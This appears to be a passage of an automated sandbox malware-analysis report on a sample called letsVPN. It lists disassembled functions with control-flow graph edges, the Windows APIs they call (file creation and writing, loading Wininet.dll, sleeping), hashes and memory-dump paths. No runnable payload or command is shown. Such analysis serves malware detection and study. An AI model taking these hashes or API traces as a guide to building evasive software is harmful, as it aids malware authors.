                                                                                                                                                                                                    • Opcode Fuzzy Hash: 755bd59cc5d153306aa08bcc3e5d8fccac77097dabe209a2a7d026265034d99e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B816E36208A8986FBA6DB2494483EE33A0F74E7D4F84C112FA5A476D5DF75C75E8301
                                                                                                                                                                                                    Function 00000001800246DC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 62fileCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1104 1800246dc-1800246e8 1105 1800246ea-1800246f2 1104->1105 1106 18002472e-180024764 call 18002a030 call 180015d78 call 180015dc8 1104->1106 1105->1106 1107 1800246f4-18002472c call 180024290 1105->1107 1113 180024769-180024774 GetFileType 1106->1113 1120 180024bfb 1106->1120 1107->1106 1107->1113 1115 1800247c2-18002482f call 18001edc4 1113->1115 1124 180024835-180024838 1115->1124 1125 1800248bc-1800248bf 1115->1125 1122 180024bfd 1120->1122 1122->1122 1126 180024ad7 1124->1126 1127 18002483e-180024841 1124->1127 1125->1126 1128 1800248c5-1800248d3 1125->1128 1129 180024adb 1126->1129 1127->1125 1130 180024843-180024859 call 1800183b4 1127->1130 1131 1800248e3-1800248ea 1128->1131 1132 1800248d5-1800248db 1128->1132 1138 180024ae1-180024b30 1129->1138 1145 180024874-18002488b call 18001f1d4 1130->1145 1146 180024868-1800248a2 call 180016e44 1130->1146 1136 180024928 1131->1136 1137 1800248ec-1800248f9 1131->1137 1134 1800248e1 1132->1134 1135 1800248dd-1800248df 1132->1135 1134->1131 1135->1131 1144 18002492c-180024932 1136->1144 1140 180024915-180024920 1137->1140 1141 1800248fb-180024903 1137->1141 1142 180024b53-180024b5f 1138->1142 1143 180024b32-180024b36 1138->1143 1140->1144 1147 180024922-180024926 1140->1147 1141->1147 1148 180024905-18002490d 1141->1148 1142->1120 1151 180024b65-180024b68 1142->1151 1143->1142 1150 180024b38-180024b4e 1143->1150 1144->1126 1149 180024938-180024943 1144->1149 1164 1800248a4-1800248b4 call 1800183b4 1145->1164 1165 18002488d-180024892 1145->1165 1146->1164 1147->1144 1148->1144 1155 18002490f-180024913 1148->1155 1149->1129 1156 180024949-180024958 1149->1156 1150->1142 1151->1120 1152 180024b6e-180024bab call 18002a060 call 180024290 1151->1152 1188 180024be1-180024bf7 1152->1188 1189 180024bad-180024bd7 call 18002a030 call 180015d78 call 18001eca4 1152->1189 1155->1144 1160 180024a5c-180024a5f 1156->1160 1161 18002495e-180024963 1156->1161 1160->1129 1163 180024a61-180024a64 1160->1163 1166 1800249d5-1800249e9 call 18001f1d4 1161->1166 1167 180024965-180024967 1161->1167 1170 18002498b-180024994 1163->1170 1171 180024a6a-180024a6e 1163->1171 1164->1146 1192 1800248b6 1164->1192 1165->1164 1172 180024894-180024898 1165->1172 1166->1146 1186 1800249ef-1800249f2 1166->1186 1167->1129 1175 18002496d-180024970 1167->1175 1177 18002499a-18002499c 1170->1177 1178 180024aa0-180024aa7 1170->1178 1180 180024a74-180024a83 call 1800183b4 1171->1180 1181 180024981-180024985 1171->1181 1172->1164 1182 18002489a call 180027804 1172->1182 1175->1129 1184 180024976-180024979 1175->1184 1177->1129 1187 1800249a2-1800249a9 1177->1187 1191 180024aad-180024ac7 call 180017010 1178->1191 1180->1170 1199 180024a89-180024a99 call 1800183b4 1180->1199 1181->1129 1181->1170 1182->1164 1184->1170 1185 18002497b-18002497f 1184->1185 1185->1181 1193 1800249ae-1800249bd call 1800183b4 1185->1193 1194 180024a13-180024a1c 1186->1194 1195 1800249f4-1800249f7 1186->1195 1187->1191 1188->1120 1226 180024bdc 1189->1226 1191->1146 1210 180024acd-180024ad3 1191->1210 1192->1125 1193->1170 1217 1800249bf-1800249cf call 1800183b4 1193->1217 1201 180024a38-180024a3d 1194->1201 1202 180024a1e-180024a33 call 180016e44 call 180015dc8 1194->1202 1195->1199 1200 1800249fd-180024a04 1195->1200 1199->1129 1219 180024a9b 1199->1219 1200->1194 1206 180024a06-180024a0e 1200->1206 1201->1199 1212 180024a3f-180024a50 call 1800183b4 1201->1212 1202->1120 1206->1138 1210->1191 1216 180024ad5 1210->1216 1212->1146 1224 180024a56-180024a5a 1212->1224 1216->1129 1217->1146 1217->1166 1219->1146 1224->1129 1226->1226
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileHandleLast_dosmaperr_errno$AddressCloseModuleProcType__create
                                                                                                                                                                                                    • String ID: p^f
                                                                                                                                                                                                    • API String ID: 4140100140-727254517
                                                                                                                                                                                                    • Opcode ID: ffdb133339664abdd8ccab489f9dadf0c4f1ff9df1a60f4f4e72272a7c8ce013
                                                                                                                                                                                                    • Instruction ID: 21a8e73e1044da5ed91c5e9c3d813a1c520d1f5f3831f37e1cb40251bc97187f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffdb133339664abdd8ccab489f9dadf0c4f1ff9df1a60f4f4e72272a7c8ce013
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69217137715A0886EB93DBA4E4953ED3360B78ABA8F508615F96A9B7D5CF38C5088700
                                                                                                                                                                                                    Function 00000001800115E0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 41threadlibraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Thread$Exit$AddressCurrentErrorLastLibraryLoadProc
                                                                                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 2428457010-2819208100
                                                                                                                                                                                                    • Opcode ID: fee9cba81f1d1c049b8ac0eea73f063606bad3971b49f0536e145ed6bcea3514
                                                                                                                                                                                                    • Instruction ID: f640b3e516520a919b36208c94240b60ea9876430bbdb97ff192dd507527698d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fee9cba81f1d1c049b8ac0eea73f063606bad3971b49f0536e145ed6bcea3514
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A015E30708B4996FFDBAB75A8443E953A16B4EBC1F44C429B84A46796EE3D870C8310
                                                                                                                                                                                                    Function 00000001800084D0 Relevance: 12.1, APIs: 8, Instructions: 87fileCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1266 1800084d0-1800084ed 1267 1800084f3-1800084f6 1266->1267 1268 180008614 1266->1268 1267->1268 1269 1800084fc-18000850e PathFileExistsW 1267->1269 1270 180008616-18000862a 1268->1270 1271 180008542-18000856c CreateFileW 1269->1271 1272 180008510-180008537 CreateFileW 1269->1272 1271->1268 1274 180008572-18000859e WideCharToMultiByte 1271->1274 1272->1271 1273 180008539-18000853c call 18002a060 1272->1273 1273->1271 1274->1268 1276 1800085a0-180008602 call 18000decc WideCharToMultiByte call 1800113f0 * 2 WriteFile call 180011098 1274->1276 1284 180008607-180008612 call 18002a060 1276->1284 1284->1270
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$ByteCharCloseCreateHandleMultiWide$ExistsPathWrite
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3442908436-0
                                                                                                                                                                                                    • Opcode ID: 01b85ae5def2a88f84cc05a2640d443a8e322579959ccafa2097096b93ef9b92
                                                                                                                                                                                                    • Instruction ID: bc84bb0ade42bd10d81e598d42a7d6411edb22724f2ff8f25fe5d380946b77e8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01b85ae5def2a88f84cc05a2640d443a8e322579959ccafa2097096b93ef9b92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53316072614B4847FBA5DF15A44879A7791F79DBF4F048324BAAA07AD5CF7CC2088B04
                                                                                                                                                                                                    Function 0000000180012545 Relevance: 12.0, APIs: 8, Instructions: 46memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1287 180012545-180012556 1288 1800125d4-1800125e4 call 18001693c call 180015dc8 1287->1288 1289 180012558-180012560 1287->1289 1303 1800125e6-1800125f5 1288->1303 1291 180012564-18001256e 1289->1291 1293 180012590-180012595 call 18002a148 1291->1293 1294 180012570-180012589 call 180019254 call 1800192c8 call 180010b34 1291->1294 1298 18001259b-1800125a1 1293->1298 1294->1293 1301 1800125a3-1800125a9 1298->1301 1302 1800125cf-1800125d2 1298->1302 1305 1800125b9-1800125be call 180015dc8 1301->1305 1306 1800125ab-1800125b5 call 18001693c 1301->1306 1302->1303 1314 1800125c4-1800125c9 call 180015dc8 1305->1314 1306->1314 1315 1800125b7 1306->1315 1314->1302 1315->1291
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_callnewh$AllocHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2989141601-0
                                                                                                                                                                                                    • Opcode ID: 6b211e8c4aa0329ed6c19c12349e77cbd62d674226e7b8a8873c600e5df7cac6
                                                                                                                                                                                                    • Instruction ID: 2ba802d8fde8188c932a9ee185128103f4f97c31fd93188f9c8e6f85ebd482bd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b211e8c4aa0329ed6c19c12349e77cbd62d674226e7b8a8873c600e5df7cac6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF118230601F8C86FBE7A7A1A5917E86651AB8CBF0F04C620BA15067C2EE7886988710
                                                                                                                                                                                                    Function 00000001800187BF Relevance: 10.5, APIs: 7, Instructions: 40synchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$CloseCodeExitHandleObjectProcessSingleWait_dosmaperr_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4283748043-0
                                                                                                                                                                                                    • Opcode ID: c95c02961cc194df7dfc83e827ea4e74a839e4b131e4c3f36add82e81babb2aa
                                                                                                                                                                                                    • Instruction ID: 88746e5f5ece916c4c2f1eca854d168e225486084e5c7e04883772d133e6b958
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c95c02961cc194df7dfc83e827ea4e74a839e4b131e4c3f36add82e81babb2aa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A014C31609A4883FBE36F25A5943AC6361AF4DBF0F90C214FA66066D4DF28C6499701
                                                                                                                                                                                                    Function 0000000180009ACA Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1340 180009aca-180009ad3 GetFileAttributesW 1341 180009ad5-180009ada CreateDirectoryW 1340->1341 1342 180009ae0-180009ae6 1340->1342 1341->1342 1343 180009b91-180009bb3 call 180012200 1342->1343 1344 180009aec-180009aef 1342->1344 1346 180009af2-180009b0b 1344->1346 1350 180009b0d-180009b10 1346->1350 1351 180009b12-180009b36 call 180010400 1350->1351 1352 180009b50-180009b58 1350->1352 1351->1352 1359 180009bb4 call 180012780 1351->1359 1354 180009b67-180009b82 call 180012830 GetFileAttributesW 1352->1354 1355 180009b5a-180009b62 call 18001285c 1352->1355 1354->1343 1361 180009b84-180009b8b CreateDirectoryW 1354->1361 1355->1354 1361->1343
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesCreateDirectoryFile$wcscatwcscpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4269979241-0
                                                                                                                                                                                                    • Opcode ID: 69e89a8265683c7f324991ffcd15ebdcd80ba550b9a02bc2d334df5dfaf67a94
                                                                                                                                                                                                    • Instruction ID: 902337c518d8cfbd194fdc28dbe7ec504bcb61d07c762cc6d237d0d59feab74b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69e89a8265683c7f324991ffcd15ebdcd80ba550b9a02bc2d334df5dfaf67a94
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8221A47120594841FEA2DB55A5A43FA7351BB8DBE4F848221FF9A429D5DF2CC74AC304
                                                                                                                                                                                                    Function 0000000180009A9C Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1363 180009a9c-180009ae6 1365 180009b91-180009bb3 call 180012200 1363->1365 1366 180009aec-180009aef 1363->1366 1368 180009af2-180009b0b 1366->1368 1372 180009b0d-180009b10 1368->1372 1373 180009b12-180009b36 call 180010400 1372->1373 1374 180009b50-180009b58 1372->1374 1373->1374 1381 180009bb4 call 180012780 1373->1381 1376 180009b67-180009b82 call 180012830 GetFileAttributesW 1374->1376 1377 180009b5a-180009b62 call 18001285c 1374->1377 1376->1365 1383 180009b84-180009b8b CreateDirectoryW 1376->1383 1377->1376 1383->1365
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: b746bd5d8d546c3e46b26d5fffc3ec12d2bafe3fd99919c886d71bc6d71907c3
                                                                                                                                                                                                    • Instruction ID: bb4cf8d93bbf9cc6e2ba9141ee1deb4e8242243cebc2ec3432d515e8a9c1d0ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b746bd5d8d546c3e46b26d5fffc3ec12d2bafe3fd99919c886d71bc6d71907c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A21A475205A8841FEA2DB51A5643FAB351BB8CBD8F448121FB8D06AD9EF2CC75AC704
                                                                                                                                                                                                    Function 0000000180003BF4 Relevance: 4.5, APIs: 3, Instructions: 26sleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep$Count64Tick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2406120688-0
                                                                                                                                                                                                    • Opcode ID: c0c22c2c1a5e76ecd7b74dd1cf3ec3cfc78094375de2df049903c45216d92349
                                                                                                                                                                                                    • Instruction ID: 92bd6339b58cb285b0f30baeb0f528f25b43fd05f0c0e39d9b1d2ed948a9e1d4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0c22c2c1a5e76ecd7b74dd1cf3ec3cfc78094375de2df049903c45216d92349
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46E0D83571044943FB9E6BB66C893E42242A74D3A1F08C738FD22C53D1CD28968D0300
                                                                                                                                                                                                    Function 0000000180001170 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: Wininet.dll
                                                                                                                                                                                                    • API String ID: 1029625771-1097394720
                                                                                                                                                                                                    • Opcode ID: ed853e58cac82df4465cd12f77fdbce7e76860c75398a916c4f7a54753ede6d9
                                                                                                                                                                                                    • Instruction ID: 073e485c13a7e7b27ab9e0a86162a95eb8d7bb4fc7f8916facea9738f35552a7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed853e58cac82df4465cd12f77fdbce7e76860c75398a916c4f7a54753ede6d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC04838A66E18D6E796AB05AC8938423A2A35D350FD08010800981220AE6C92AE8704
                                                                                                                                                                                                    Function 0000000180003B3C Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderFromListLocationPathSpecial
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4082711253-0
                                                                                                                                                                                                    • Opcode ID: 184cb7061c3642203eff8c54a320cb8dbe641d72029d754cca35c4258ce58e64
                                                                                                                                                                                                    • Instruction ID: feab0ae93b2b30bbcc2224f3f5fcba4d06cd33ee75b1b09efc6b2fb10b5be483
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 184cb7061c3642203eff8c54a320cb8dbe641d72029d754cca35c4258ce58e64
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0115E32228A8492EB61DF61E9943DAB360FB8C784F805115FB8D07A59DF7CC3588B40
                                                                                                                                                                                                    Function 000000018000CBB8 Relevance: 1.5, APIs: 1, Instructions: 45fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                    • Opcode ID: 9666489a833a73eff41d0b3baec99d27baec5b800e83a14c7402f0aa1abc0318
                                                                                                                                                                                                    • Instruction ID: acc06959da3d9712720987d0b20ddc4dba30eb22f803056048d3d8fea3528b98
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9666489a833a73eff41d0b3baec99d27baec5b800e83a14c7402f0aa1abc0318
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E111AC72710AA887E745CB16D540B987BA0B388FC0F18C126EF4843755CF74D959CB40
                                                                                                                                                                                                    Function 000000018000CC4C Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                    • Opcode ID: fc0ea25f90da82498166189dbe9598355ec11401fdfaf2546442f37b59e2b66a
                                                                                                                                                                                                    • Instruction ID: 56483d2a9befe1b8b596d06e987917f3c630e3ce225550242b47b491e13c95c6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc0ea25f90da82498166189dbe9598355ec11401fdfaf2546442f37b59e2b66a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF017172B2515886FBF7C729C194FA93690D36D784E74C105E50D06A90DD168A8A9F03
                                                                                                                                                                                                    Function 000000018000CCC8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                    • Opcode ID: 246a4a6351a4c6fdf35d294530dfbe8373b88ff892669a6b1248780a686fec8b
                                                                                                                                                                                                    • Instruction ID: 370f273d4e0260f5760ccfb9bde25e09b1d70ed71676843be9854db92f8c4394
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 246a4a6351a4c6fdf35d294530dfbe8373b88ff892669a6b1248780a686fec8b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DE0267261508886F7B7CB3DC084FA93BA2830CB88F28C414EE0E12280CE26C6DF9701
                                                                                                                                                                                                    Function 0000000180003102 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
